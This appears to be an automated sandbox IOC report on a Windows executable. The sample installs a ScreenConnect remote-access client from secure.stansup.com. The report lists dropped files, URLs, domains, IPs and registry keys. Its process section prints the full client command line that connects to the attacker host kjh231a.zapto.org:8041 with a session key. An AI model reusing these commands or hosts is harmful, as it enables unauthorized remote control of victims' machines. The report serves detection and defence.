IOC Report
3coxOaV92n.exe

Files

File Path
Type
Category
Malicious
3coxOaV92n.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3coxOaV92n.exe_13c990b719c88e7e398da3cbdb8fa19db9e9438_1be62bd4_4fcf22e5-136c-4a5c-bcb6-45c782844a7b\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x5da598e5, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FB7.tmp.dmp
Mini DuMP crash report, 14 streams, Fri Oct 25 17:29:16 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER50C2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5101.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER510F.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER516E.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\fy1ftoo0.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76GEJ2UX.log
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\1A8JLAL6.KO1\RZBMYN0L.REL.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
modified
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\System32\user.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\3coxOaV92n.exe
"C:\Users\user\Desktop\3coxOaV92n.exe"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

URLs

Name
IP
Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2001
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnec
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application?
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationft
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application9
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationH
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.confign
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exeC
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://secure.staPB
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
79.110.49.185
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
unknown
https://secure.stansup.com
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application1
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
unknown
http://Passport.NET/STS</ds:KeyName></ds:KeyInfo><Ciph
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
https://account.live.
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationh
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationP
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdnc#
unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application34e089
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.stansup.com/Bin/ScreenConnect.C
unknown
http://Passport.NET/tb_
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationKy
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
79.110.49.185
https://account.live.com/msangcwam
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
79.110.49.185
http://www.w3.or
unknown
http://crl.ver)
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
unknown
http://passport.net/tb
unknown
https://secure.staP
unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationx
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds/www
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
unknown
https://secure.staPx
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windo
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
79.110.49.185
https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuer
unknown
http://schemas.xmlsoap.org/ws/2005/02/scR
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
unknown
http://schemas.xmlsoap.org/ws/2005/02/trustm
unknown
https://secure.stansup.com/Bn
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.Window
unknown
http://schemas.xmlsoap.org/ws/2005/02/scicy
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll
79.110.49.185
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe0
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust
unknown
https://login.microsoftonline.com/MSARST2.srf
unknown
http://Passport.NET/STS
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xml
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll#
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicat
unknown
http://www.w3.o
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
79.110.49.185
https://account.live.co
unknown
http://Passport.NET/tb
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
79.110.49.185
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
unknown
https://signup.live.com/signup.aspx
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
79.110.49.185
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdOAPF
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
unknown
https://login.microsoftonline.com/MSARST2.srfH
unknown
http://schemas.xmlsoap.org/ws/2004/09/policy
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application899
unknown
https://secure.stansup.com/Bin/ScreenConnect.Core.dll
79.110.49.185

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.210.172
secure.stansup.com
79.110.49.185
kjh231a.zapto.org
79.110.49.185
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.18
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
79.110.49.185
secure.stansup.com
Germany

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
